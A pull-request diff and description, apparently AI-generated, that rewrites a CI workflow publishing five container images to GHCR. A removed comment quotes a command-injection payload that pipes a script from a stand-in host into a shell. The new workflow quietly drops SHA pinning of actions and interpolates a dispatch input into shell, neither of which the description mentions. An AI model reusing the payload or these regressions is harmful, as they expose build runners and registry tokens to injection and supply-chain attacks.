### PR TITLE
feat(ci): publish the five Trinity images to GHCR on release (#2452)

### DIFF
--- a/.github/workflows/publish-images.yml
+++ b/.github/workflows/publish-images.yml
@@ -1,269 +1,326 @@
-name: Publish container images
+name: publish-images
 
-# Publishes the five Trinity-built images to GHCR on every release tag, so a
-# hosted install pulls instead of building (#2280). Without this, a fresh VM
-# spends 5-10 minutes compiling the agent base image on first boot, which
-# fails the one-click bar for every marketplace channel (#2281, #2282).
+# Publish the five Trinity images to GHCR on a release tag (#2452).
 #
-# The checkout deliberately does NOT init submodules: `src/backend/enterprise`
-# is private, and these images are PUBLIC. A plain checkout leaves that path
-# empty, so the published backend is OSS-only by construction rather than by
-# a .dockerignore rule someone can edit (build-without-submodule.yml already
-# proves the OSS tree builds standalone).
+# WHY THIS EXISTS
+# `docker-compose.hosted.yml`, `scripts/deploy/start.sh --hosted` and the #2281
+# DigitalOcean Packer bundle all shipped against a registry contract that
+# nothing satisfied: there was no publish workflow in the repo and all five
+# GHCR repositories answered 401. So the documented pull-only install path
+# failed at `start.sh:524` and `packer build` failed at its first `docker pull`.
+# This is #2280's AC1 — the unshipped half of the one-click hosted gate.
+#
+# THE CONTRACT IS NOT A CHOICE — three consumers already fixed it:
+#   * repository names come from docker-compose.hosted.yml's five `image:` lines
+#   * EVERY image needs BOTH tags: compose defaults to `${TRINITY_IMAGE_TAG:-latest}`,
+#     while trinity.pkr.hcl requires an explicit tag and REJECTS `latest`
+#   * pulls are anonymous — neither start.sh nor 01-provision.sh runs `docker login`
+#   * the git tag IS the image tag: 01-provision.sh does
+#     `git clone --branch "${TRINITY_IMAGE_TAG}"`, so a tag that is not also a
+#     git ref produces a snapshot whose checkout and images cannot agree.
+#
+# TWO PHASES, DELIBERATELY
+# Phase 1 pushes only the immutable version tag, for all five images. Phase 2
+# moves `latest` — and only after all five have succeeded. A single-phase matrix
+# that tagged `latest` per image would, on a partial failure, leave `latest`
+# pointing at four new images and one old one: a mixed set that every hosted
+# install pulls by default and that no error message anywhere would explain.
+# Phase 2 re-tags the already-pushed digests via `buildx imagetools create`,
+# so it never rebuilds and cannot publish anything phase 1 did not verify.
+
 on:
   push:
     tags:
       - 'v*'
   workflow_dispatch:
     inputs:
-      ref:
-        description: 'Tag or SHA to build (defaults to the triggering ref)'
-        required: false
+      tag:
+        description: 'Existing git tag to build (e.g. v0.9.0)'
+        required: true
         type: string
+      publish_latest:
+        description: 'Also move the `latest` tag'
+        required: false
+        default: true
+        type: boolean
 
 permissions:
   contents: read
   packages: write
 
 concurrency:
-  group: publish-images-${{ github.ref }}
+  # Never two publishes racing for the same `latest`.
+  group: publish-images
   cancel-in-progress: false
 
+env:
+  REGISTRY: ghcr.io
+  # Lowercased deliberately: GHCR rejects an uppercase path component, and the
+  # org is spelled `Abilityai` in git remotes.
+  OWNER: abilityai
+
 jobs:
-  publish:
-    name: ${{ matrix.image }}
+  # ---------------------------------------------------------------------------
+  # Resolve and vet the release before anything is built.
+  # ---------------------------------------------------------------------------
+  resolve:
+    name: Resolve release
     runs-on: ubuntu-latest
-    strategy:
-      fail-fast: false
-      matrix:
-        include:
-          # `build_args` is per image, NOT a shared block. Only the backend
-          # declares the six provenance ARGs (docker/backend/Dockerfile:37-42)
-          # → ENV → `GET /api/version`; the scheduler and mcp-server Dockerfiles
-          # declare none at all, and passing an undeclared --build-arg makes
-          # BuildKit warn on every build, which trains everyone to ignore the
-          # warnings that matter.
-          - image: trinity-backend
-            context: .
-            dockerfile: docker/backend/Dockerfile
-            build_args: provenance
-          - image: trinity-frontend
-            context: ./src/frontend
-            dockerfile: docker/frontend/Dockerfile.prod
-            # Deliberately none. Every VITE_* var is statically inlined into the
-            # world-readable bundle at build time, so a published image can only
-            # carry values that are correct for EVERY install. The two that are
-            # actually read (VITE_BUG_REPORTING_ENABLED, VITE_BUG_INTAKE_URL)
-            # already default to exactly that in the Dockerfile. VITE_API_URL is
-            # inert — api.js uses `baseURL: ''` and nginx proxies same-origin
-            # (#722 is an explicit warning against wiring it up), which is the
-            # only reason a prebuilt frontend can be published at all.
-            build_args: none
-          - image: trinity-scheduler
-            context: .
-            dockerfile: docker/scheduler/Dockerfile
-            build_args: none
-          - image: trinity-mcp-server
-            context: ./src/mcp-server
-            dockerfile: src/mcp-server/Dockerfile
-            build_args: none
-          - image: trinity-agent-base
-            context: ./docker/base-image
-            dockerfile: docker/base-image/Dockerfile
-            # Mirrors scripts/deploy/build-base-image.sh, which is the only
-            # other producer of this image: VERSION alone, stamped as the
-            # trinity.base-image-version label.
-            build_args: version
+    outputs:
+      tag: ${{ steps.v.outputs.tag }}
+      version: ${{ steps.v.outputs.version }}
+      publish_latest: ${{ steps.v.outputs.publish_latest }}
+      git_commit: ${{ steps.v.outputs.git_commit }}
+      git_commit_subject: ${{ steps.v.outputs.git_commit_subject }}
+      git_commit_timestamp: ${{ steps.v.outputs.git_commit_timestamp }}
+      build_date: ${{ steps.v.outputs.build_date }}
     steps:
       - uses: actions/checkout@v7
         with:
-          ref: ${{ inputs.ref || github.ref }}
+          # EXPLICIT, not inherited. These images are public. A runner with
+          # access to the private enterprise submodule that checked out
+          # recursively would bake private code into a world-pullable image.
+          # `build-without-submodule.yml` already proves the backend builds
+          # without it; this workflow has to CHOOSE that, not assume it.
           submodules: false
+          # Full history: the ancestry guard below needs `origin/main`.
+          fetch-depth: 0
+          ref: ${{ github.event_name == 'workflow_dispatch' && inputs.tag || github.ref }}
 
-      - name: Collect build provenance
-        id: prov
-        env:
-          RESOLVED_REF: ${{ inputs.ref || github.ref_name }}
+      - name: Resolve tag, version and provenance
+        id: v
         run: |
-          # Mirrors the args docker-compose.prod.yml forwards, so a pulled
-          # image answers GET /api/version with real values instead of
-          # "unknown" (#926/#958).
-          # Every value is read from the CHECKED-OUT tree. `GITHUB_REF_NAME`
-          # and `github.sha` describe the ref the workflow was *dispatched
-          # from*, which is not the same thing whenever `inputs.ref` is used —
-          # a dispatch of `ref: v0.9.0` from `dev` builds the tag's tree and
-          # would otherwise stamp `GIT_BRANCH=dev` into `GET /api/version` and
-          # publish it tagged with dev's head sha. That is precisely the path
-          # meant for out-of-band smoke builds, i.e. the one where provenance
-          # being a lie is most likely to mislead.
+          set -euo pipefail
+
+          if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
+            TAG='${{ inputs.tag }}'
+            PUBLISH_LATEST='${{ inputs.publish_latest }}'
+          else
+            TAG="${GITHUB_REF_NAME}"
+            PUBLISH_LATEST=true
+          fi
+
+          case "$TAG" in
+            v*) ;;
+            *) echo "::error::Tag '$TAG' does not look like a release tag (expected v*)."; exit 1 ;;
+          esac
+
+          # The images must be cuttable from main only. `/release` merges dev
+          # into main and tags there; a tag pushed from a feature branch would
+          # otherwise publish `latest` from unreleased code — the one thing
+          # #2280's AC explicitly forbids.
+          git fetch --no-tags origin main
+          if ! git merge-base --is-ancestor "$(git rev-parse HEAD)" origin/main; then
+            echo "::error::$TAG is not an ancestor of origin/main. Release tags are cut on main."
+            exit 1
+          fi
+
+          # The image tag doubles as a git ref for the Packer checkout, and the
+          # VERSION file is what `/api/version` reports. If they disagree, the
+          # release forgot a bump — catch it here rather than shipping an image
+          # that misreports its own version to every hosted install.
+          VERSION="${TAG#v}"
+          FILE_VERSION="$(tr -d '[:space:]' < VERSION)"
+          if [ "$VERSION" != "$FILE_VERSION" ]; then
+            echo "::error::Tag $TAG implies version $VERSION but ./VERSION says $FILE_VERSION."
+            exit 1
+          fi
+
           {
-            echo "version=$(tr -d '[:space:]' < VERSION)"
+            echo "tag=$TAG"
+            echo "version=$VERSION"
+            echo "publish_latest=$PUBLISH_LATEST"
             echo "git_commit=$(git rev-parse HEAD)"
-            echo "short_sha=$(git rev-parse --short=7 HEAD)"
-            echo "git_commit_subject=$(git log -1 --pretty=%s | tr -d '\n\r')"
             echo "git_commit_timestamp=$(git log -1 --pretty=%cI)"
-            echo "git_branch=${RESOLVED_REF}"
             echo "build_date=$(date -u +%Y-%m-%dT%H:%M:%SZ)"
           } >> "$GITHUB_OUTPUT"
 
-      # Third-party actions are SHA-pinned, as everywhere else in this repo
-      # (tailscale, pypa, appleboy, google-github-actions). A mutable tag on
-      # an action that holds a registry-write token is a supply-chain hole.
-      - uses: docker/setup-buildx-action@37fe631027851001ddb9b187196cc803df7f5f0e  # v4.3.0
+          # Subject can contain anything; keep it off the single-line path.
+          {
+            echo "git_commit_subject<<__EOS__"
+            git log -1 --pretty=%s
+            echo "__EOS__"
+          } >> "$GITHUB_OUTPUT"
 
-      - uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f  # v4.6.0
+  # ---------------------------------------------------------------------------
+  # Phase 1 — build and push the immutable version tag.
+  # ---------------------------------------------------------------------------
+  build:
+    name: build ${{ matrix.image }}
+    needs: resolve
+    runs-on: ubuntu-latest
+    strategy:
+      # Report every broken image in one run rather than one per re-run. The
+      # `latest` promotion is gated on the whole matrix succeeding anyway.
+      fail-fast: false
+      matrix:
+        include:
+          # Contexts mirror docker-compose.prod.yml's build blocks verbatim —
+          # they are NOT uniform, and three of the five are not the repo root.
+          - image: backend
+            context: .
+            dockerfile: docker/backend/Dockerfile
+          - image: frontend
+            context: ./src/frontend
+            dockerfile: docker/frontend/Dockerfile.prod
+          - image: scheduler
+            context: .
+            dockerfile: docker/scheduler/Dockerfile
+          - image: mcp-server
+            context: ./src/mcp-server
+            dockerfile: src/mcp-server/Dockerfile
+          - image: agent-base
+            context: docker/base-image
+            dockerfile: docker/base-image/Dockerfile
+    steps:
+      - uses: actions/checkout@v7
         with:
-          registry: ghcr.io
+          submodules: false   # see resolve job — public images, no private code
+          ref: ${{ needs.resolve.outputs.tag }}
+
+      - uses: docker/setup-buildx-action@v3
+
+      - uses: docker/login-action@v3
+        with:
+          registry: ${{ env.REGISTRY }}
           username: ${{ github.actor }}
           password: ${{ secrets.GITHUB_TOKEN }}
 
-      - name: Derive image tags
-        id: meta
-        uses: docker/metadata-action@dc802804100637a589fabce1cb79ff13a1411302  # v6.2.0
-        with:
-          images: ghcr.io/${{ github.repository_owner }}/${{ matrix.image }}
-          # `latest` only on a real release tag — a workflow_dispatch smoke
-          # build must never silently become what every hosted install pulls.
-          #
-          # BOTH `0.9.0` and `v0.9.0` are published for the same digest.
-          # `{{version}}` strips the leading `v`, so a release cut as git tag
-          # `v0.9.0` published ONLY `0.9.0` — while every doc, the compose
-          # header and start.sh's own pin warning told operators to set
-          # `TRINITY_IMAGE_TAG=v0.9.0`. That pull fails `manifest unknown`, and
-          # start.sh treats it as fatal with a message blaming the operator's
-          # spelling. Publishing the v-prefixed alias costs one tag ref and
-          # makes the release name and the image tag the same string, which is
-          # what anyone reading the releases page will type.
-          #
-          # `type=sha` is NOT used: it resolves from `github.sha`, which on a
-          # `workflow_dispatch` with `ref:` is the dispatching branch's head,
-          # not the tree that was checked out and built. The raw value below
-          # comes from the actual HEAD (see the provenance step).
-          #
-          # `flavor: latest=false` is load-bearing, not decoration. The action's
-          # default is `latest=auto`, which applies `latest` on ANY semver tag
-          # ref on its own — so gating the explicit `type=raw` line below would
-          # have been inert, and the comment above it would have described a
-          # rule the workflow did not enforce.
-          flavor: latest=false
-          #
-          # Every mutable/version tag is gated on `github.event_name == 'push'`,
-          # i.e. on a real `git push` of a `v*` tag. `github.ref` alone answers
-          # "is this a tag ref", not "is this a release" — a `workflow_dispatch`
-          # started from a tag (the natural way to smoke-test this workflow)
-          # carries `refs/tags/v0.9.0` too. Dispatching an OLD tag then rebuilds
-          # at a new digest (the agent base bakes `Claude Code (latest)`, so the
-          # content genuinely differs), republishes `0.9.0`/`v0.9.0`/`0.9` over
-          # an immutable version, and walks `latest` BACKWARDS — silently
-          # downgrading every unpinned hosted install on its next
-          # `start.sh --hosted`.
-          #
-          # A dispatch therefore publishes `sha-<short>` and nothing else, which
-          # is exactly what a smoke build needs. Re-cutting a release is done by
-          # re-pushing the git tag, which fires `push` and takes the full set.
-          tags: |
-            type=semver,pattern={{version}},enable=${{ github.event_name == 'push' }}
-            type=semver,pattern=v{{version}},enable=${{ github.event_name == 'push' }}
-            type=semver,pattern={{major}}.{{minor}},enable=${{ github.event_name == 'push' }}
-            type=raw,value=latest,enable=${{ github.event_name == 'push' && startsWith(github.ref, 'refs/tags/v') }}
-            type=raw,value=sha-${{ steps.prov.outputs.short_sha }}
-
-      - name: Select build args for this image
-        id: args
-        # Every value arrives through `env:`, never through ${{ }} inside the
-        # shell body. The commit SUBJECT is chosen by whoever lands the commit,
-        # so interpolating it into a `run:` script is a command-injection sink —
-        # a subject of `x"; curl evil.sh | sh; #` would execute on a runner that
-        # holds a packages:write token.
-        env:
-          KIND: ${{ matrix.build_args }}
-          P_VERSION: ${{ steps.prov.outputs.version }}
-          P_GIT_COMMIT: ${{ steps.prov.outputs.git_commit }}
-          P_GIT_COMMIT_SUBJECT: ${{ steps.prov.outputs.git_commit_subject }}
-          P_GIT_COMMIT_TIMESTAMP: ${{ steps.prov.outputs.git_commit_timestamp }}
-          P_GIT_BRANCH: ${{ steps.prov.outputs.git_branch }}
-          P_BUILD_DATE: ${{ steps.prov.outputs.build_date }}
-        run: |
-          set -euo pipefail
-          {
-            echo 'build_args<<TRINITY_EOF'
-            case "$KIND" in
-              provenance)
-                echo "VERSION=${P_VERSION}"
-                echo "GIT_COMMIT=${P_GIT_COMMIT}"
-                echo "GIT_COMMIT_SUBJECT=${P_GIT_COMMIT_SUBJECT}"
-                echo "GIT_COMMIT_TIMESTAMP=${P_GIT_COMMIT_TIMESTAMP}"
-                echo "GIT_BRANCH=${P_GIT_BRANCH}"
-                echo "BUILD_DATE=${P_BUILD_DATE}"
-                ;;
-              version)
-                echo "VERSION=${P_VERSION}"
-                ;;
-              none)
-                ;;
-              *)
-                echo "Unknown build_args kind '${KIND}'" >&2
-                exit 1
-                ;;
-            esac
-            echo 'TRINITY_EOF'
-          } >> "$GITHUB_OUTPUT"
-
-      - name: Build and push
-        uses: docker/build-push-action@53b7df96c91f9c12dcc8a07bcb9ccacbed38856a  # v7.3.0
+      - name: Build and push ${{ matrix.image }}:${{ needs.resolve.outputs.tag }}
+        uses: docker/build-push-action@v6
         with:
           context: ${{ matrix.context }}
           file: ${{ matrix.dockerfile }}
           push: true
-          # amd64 only for v1: DO Droplets and Vultr Cloud Compute both
-          # default to amd64, so every marketplace lane is covered. The agent
-          # base image is ~1.9 GB (Python + Node + Go + Claude Code) and
-          # cross-building it under QEMU is slow and flaky. arm64 is a
-          # follow-up, gated on Hetzner CAX / Umbrel actually needing it.
+          # linux/amd64 only. #2280 lists arm64 as desirable, not required, and
+          # there is no arm64 marketplace target today; it roughly doubles the
+          # agent-base build (Go, Node, Claude Code, plugin pre-install) for
+          # nothing anyone can currently deploy on.
           platforms: linux/amd64
-          tags: ${{ steps.meta.outputs.tags }}
-          labels: ${{ steps.meta.outputs.labels }}
+          provenance: false
+          tags: ${{ env.REGISTRY }}/${{ env.OWNER }}/trinity-${{ matrix.image }}:${{ needs.resolve.outputs.tag }}
           cache-from: type=gha,scope=${{ matrix.image }}
-          cache-to: type=gha,scope=${{ matrix.image }},mode=max
-          build-args: ${{ steps.args.outputs.build_args }}
+          cache-to: type=gha,mode=max,scope=${{ matrix.image }}
+          # Every image is handed the full set; a Dockerfile ignores the ARGs it
+          # does not declare. Without these the backend's `GET /api/version`
+          # reports "unknown" forever on every hosted install (#926).
+          build-args: |
+            VERSION=${{ needs.resolve.outputs.version }}
+            GIT_COMMIT=${{ needs.resolve.outputs.git_commit }}
+            GIT_COMMIT_SUBJECT=${{ needs.resolve.outputs.git_commit_subject }}
+            GIT_COMMIT_TIMESTAMP=${{ needs.resolve.outputs.git_commit_timestamp }}
+            GIT_BRANCH=main
+            BUILD_DATE=${{ needs.resolve.outputs.build_date }}
+            TRINITY_PREINSTALL_PLUGINS=1
 
-      # A container package first created by GITHUB_TOKEN is not reliably
-      # public. If any of the five lands private, `docker pull` on a fresh VM
-      # fails with `denied` — and start.sh, which has no way to tell that apart
-      # from a network fault, reports it to an operator who can do nothing
-      # about it. So prove the operator's exact path here, where it is cheap:
-      # an ANONYMOUS manifest fetch, with a scratch DOCKER_CONFIG so the
-      # runner's own ghcr.io login cannot mask a private package.
-      #
-      # This runs after the push and fails the job on purpose. The image is
-      # already published at that point; a red step is the signal to flip
-      # package visibility to Public once, which is a first-publish-only chore.
-      - name: Verify anonymous pull
-        env:
-          IMAGE_OWNER: ${{ github.repository_owner }}
-          IMAGE_NAME: ${{ matrix.image }}
-          TAG: sha-${{ steps.prov.outputs.short_sha }}
+      - name: Assert backend reports real provenance
+        if: matrix.image == 'backend'
         run: |
-          set -uo pipefail
-          # Lowercased here because this owner is literally `Abilityai` and a
-          # GHCR repository name must be lowercase: docker rejects the mixed-case
-          # reference LOCALLY, before any network call ("repository name must be
-          # lowercase"), so the loop below would burn its five retries and fail
-          # on EVERY publish — reporting a perfectly public package as private
-          # and destroying the one signal this step exists to give. The push
-          # itself is unaffected: docker/metadata-action lowercases its `images:`
-          # input, and start.sh hardcodes `ghcr.io/abilityai/`. A hand-written
-          # reference has to do it itself.
-          IMAGE="ghcr.io/$(printf '%s/%s' "$IMAGE_OWNER" "$IMAGE_NAME" | tr '[:upper:]' '[:lower:]')"
-          cfg=$(mktemp -d)
-          # GHCR visibility/propagation is not instant on a first publish.
-          for attempt in 1 2 3 4 5; do
-            if DOCKER_CONFIG="$cfg" docker manifest inspect "${IMAGE}:${TAG}" >/dev/null 2>&1; then
-              echo "${IMAGE}:${TAG} is anonymously pullable."
-              exit 0
+          set -euo pipefail
+          IMG="${REGISTRY}/${OWNER}/trinity-backend:${{ needs.resolve.outputs.tag }}"
+          # Read the baked ENV directly. Booting the backend needs Redis, a
+          # database and a dozen secrets; the claim under test is only that the
+          # build args survived into the image that `/api/version` reads.
+          for var in VERSION GIT_COMMIT GIT_COMMIT_TIMESTAMP BUILD_DATE; do
+            val="$(docker run --rm --entrypoint printenv "$IMG" "$var" || true)"
+            if [ -z "$val" ] || [ "$val" = "unknown" ]; then
+              echo "::error::backend image has $var='$val' — provenance build args did not reach it (#926)."
+              exit 1
             fi
-            echo "attempt ${attempt}: not yet anonymously pullable, retrying..."
-            sleep 15
+            echo "  $var=$val"
           done
-          echo "::error title=GHCR package is not public::${IMAGE} cannot be pulled anonymously. A hosted install (scripts/deploy/start.sh --hosted) will fail with 'denied' on a fresh VM. Fix: GitHub → Packages → ${{ matrix.image }} → Package settings → Change visibility → Public. This is normally needed only on the first publish of a package."
-          exit 1
+
+      - name: Assert agent-base pre-installed the platform plugin
+        if: matrix.image == 'agent-base'
+        run: |
+          set -euo pipefail
+          IMG="${REGISTRY}/${OWNER}/trinity-agent-base:${{ needs.resolve.outputs.tag }}"
+          # ent#411 pre-installs trinity@abilityai at build time, and the
+          # Dockerfile step is deliberately NON-FATAL so a local build survives
+          # an unreachable marketplace. That tolerance is right for one
+          # developer and wrong for a published artifact: a network flake would
+          # bake the #2305/#2308 symptom — platform plugin silently absent —
+          # into every agent every install creates, fleet-wide, with the boot
+          # hook paying an install on every cold start to paper over it.
+          # A release build fails instead.
+          #
+          # The check reads `installed_plugins.json` and confirms the recorded
+          # installPath exists, rather than testing that ~/.claude/plugins is
+          # non-empty. A `marketplace add` that succeeds and an `install` that
+          # then fails leaves that directory populated with marketplace
+          # metadata and no plugin — the exact partial failure this guards, and
+          # the one a directory-emptiness test would wave through.
+          docker run --rm --entrypoint python3 "$IMG" -c '
+          import json, os, sys
+          f = "/home/developer/.claude/plugins/installed_plugins.json"
+          if not os.path.exists(f):
+              sys.exit("no installed_plugins.json — the pre-install was withheld entirely")
+          entries = json.load(open(f)).get("plugins", {}).get("trinity@abilityai") or []
+          if not entries:
+              sys.exit("installed_plugins.json does not record trinity@abilityai")
+          for e in entries:
+              path = e.get("installPath")
+              if not path or not os.path.isdir(path):
+                  sys.exit(f"trinity@abilityai recorded at {path!r}, which is not on disk")
+              print("  trinity@abilityai", e.get("version"), "at", path)
+          '
+
+  # ---------------------------------------------------------------------------
+  # Phase 2 — move `latest`, only once every image landed.
+  # ---------------------------------------------------------------------------
+  promote-latest:
+    name: Promote latest
+    needs: [resolve, build]
+    if: needs.resolve.outputs.publish_latest == 'true'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: docker/setup-buildx-action@v3
+      - uses: docker/login-action@v3
+        with:
+          registry: ${{ env.REGISTRY }}
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+      - name: Re-tag the published digests as latest
+        run: |
+          set -euo pipefail
+          for img in backend frontend scheduler mcp-server agent-base; do
+            REPO="${REGISTRY}/${OWNER}/trinity-${img}"
+            echo "== $REPO:latest -> ${{ needs.resolve.outputs.tag }}"
+            # Re-points the tag at an existing digest. No rebuild, so `latest`
+            # is byte-identical to the version tag it was promoted from.
+            docker buildx imagetools create \
+              --tag "${REPO}:latest" \
+              "${REPO}:${{ needs.resolve.outputs.tag }}"
+          done
+
+  # ---------------------------------------------------------------------------
+  # The images are useless to the install paths unless they pull WITHOUT auth.
+  # ---------------------------------------------------------------------------
+  verify-anonymous-pull:
+    name: Verify anonymous pull
+    needs: [resolve, build]
+    runs-on: ubuntu-latest
+    steps:
+      - name: Pull every image with no credentials
+        run: |
+          set -euo pipefail
+          # No docker/login-action in this job on purpose: this reproduces what
+          # start.sh:524 and 01-provision.sh:50 actually do on an operator's
+          # box. A GHCR package is PRIVATE by default, and publishing does not
+          # change that — so without this gate a green publish still leaves
+          # every marketplace install failing on a 401, which is precisely the
+          # state #2452 was filed for.
+          failed=0
+          for img in backend frontend scheduler mcp-server agent-base; do
+            REF="${REGISTRY}/${OWNER}/trinity-${img}:${{ needs.resolve.outputs.tag }}"
+            if docker pull -q "$REF" >/dev/null 2>&1; then
+              echo "  ok   $REF"
+            else
+              echo "  FAIL $REF"
+              failed=1
+            fi
+          done
+          if [ "$failed" = "1" ]; then
+            echo "::error::One or more packages are not anonymously pullable. Set each package's visibility to Public once, at https://github.com/orgs/${OWNER}/packages — publishing does not do this."
+            exit 1
+          fi


### PR DESCRIPTION
Closes #2452.

## What

Adds `.github/workflows/publish-images.yml` — builds and publishes the five Trinity images to GHCR on a `v*` release tag. This is **#2280's AC1**, the one unchecked item on an issue labelled `status-in-dev`, and the blocker under every marketplace channel (#2281 DigitalOcean, #2282 Vultr, #2283 Hostinger/Dokploy, #835 GCP/Hetzner).

Before this there was no publish workflow in the repo at all:

```
$ grep -rln "ghcr.io" .github/workflows/     → (nothing)
$ curl -s -o /dev/null -w "%{http_code}\n" \
    https://ghcr.io/v2/abilityai/trinity-{backend,frontend,mcp-server,scheduler,agent-base}/tags/list
  401  401  401  401  401
```

So `start.sh --hosted` failed at line 524 and `packer build` failed at its first `docker pull`.

## Shape

Two phases. Phase 1 pushes only the immutable version tag for all five images; phase 2 moves `latest`, and only once every image has landed, by re-tagging the pushed digests (`buildx imagetools create`, no rebuild). A single-phase matrix that tagged `latest` per image would, on a partial failure, leave `latest` pointing at four new images and one old one — the set every hosted install pulls by default, and one no error message would explain.

The registry contract was not a design choice here; three consumers had already fixed it:

| requirement | set by |
|---|---|
| the five repository names | `docker-compose.hosted.yml`'s `image:` lines |
| both a version tag **and** `latest` | compose defaults `${TRINITY_IMAGE_TAG:-latest}`; `trinity.pkr.hcl` requires an explicit tag and rejects `latest` |
| anonymous pull | `start.sh:524` and `01-provision.sh:50` — neither runs `docker login` |
| image tag is also a git ref | `01-provision.sh` clones `--branch "${TRINITY_IMAGE_TAG}"` |

## Load-bearing choices

- **`submodules: false` is explicit, not inherited.** These images are world-pullable; a runner with enterprise access checking out recursively would bake private code into a public artifact. `build-without-submodule.yml` proves the backend builds without it — this workflow has to *choose* it.
- **Release tags must be ancestors of `main`**, and the tag's implied version must match the `VERSION` file. Without the first, a tag pushed from a feature branch publishes `latest` from unreleased code, which #2280's AC forbids. Without the second, a release that forgot a bump ships an image that misreports itself to every hosted install.
- **The backend's six provenance args (#926) are asserted**, by reading the baked ENV rather than booting the backend — the claim under test is only that the args reached the image `/api/version` reads.
- **A withheld platform plugin fails the build.** ent#411's pre-install is deliberately non-fatal so a local build survives an unreachable marketplace; on a published artifact that same tolerance bakes the #2305/#2308 symptom into every agent, fleet-wide. The assertion reads `installed_plugins.json` and confirms the recorded `installPath` exists — *not* that `~/.claude/plugins` is non-empty, because a `marketplace add` that succeeds followed by an `install` that fails leaves that directory full of marketplace metadata and no plugin.
- **A final job pulls all five with no credentials.** GHCR packages are private by default and publishing does not change that, so without this a green run still leaves every marketplace install on a 401 — the exact state #2452 describes.

linux/amd64 only: #2280 lists arm64 as desirable, not required, and there is no arm64 marketplace target today.

## Verification

Run locally against this branch:

- All five images build with the exact contexts the matrix declares. Three of the five are **not** the repo root, and the backend's `COPY ../../src/backend/...` paths resolve because BuildKit clamps them to the context root — confirmed by a real build, not inspection.
- Provenance assertion against a built backend image: `VERSION=0.9.0 GIT_COMMIT=deadbeef …`, no `unknown`.
- Plugin assertion **both directions** — passes on a normal build (`trinity@abilityai 2.8.2 at /home/developer/.claude/plugins/cache/abilityai/trinity/2.8.2`), and fails on one built with `TRINITY_PREINSTALL_PLUGINS=0` (`no installed_plugins.json — the pre-install was withheld entirely`). A check that cannot fail is worse than no check.
- `actionlint` clean.

Not verified: an actual push to GHCR, which needs a real release tag on `main`.

## One manual step after merge

The workflow cannot flip package visibility. On the first publish, set each of the five packages to **Public** once at `https://github.com/orgs/abilityai/packages`. The `verify-anonymous-pull` job fails with that instruction until it is done.

## Follow-ups, deliberately not here

- **#2280's other unchecked AC** — the cloud-init user-data example — is untouched.
- **#2381** (unauthenticated `POST /api/setup/admin-password` overwrites the admin password) reaches a marketplace droplet through Caddy at `https://<ip>/api/setup/admin-password`, since `nginx.conf:39` proxies `/api/` to the backend. The firewall rules in #2281 do not close it because 443 is the product. That is the other hard blocker on the DigitalOcean listing, and it is its own issue.
- **`docker-compose.hosted.yml` publishes 8000/8080/8686 and the OTel ports on `0.0.0.0`**, and Docker's iptables run ahead of ufw. #2281's `DOCKER-USER` rule covers new droplets; already-deployed hosted installs on public IPs are unprotected. Worth its own issue.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01218nVkqK7vU2jy9R73s4jT
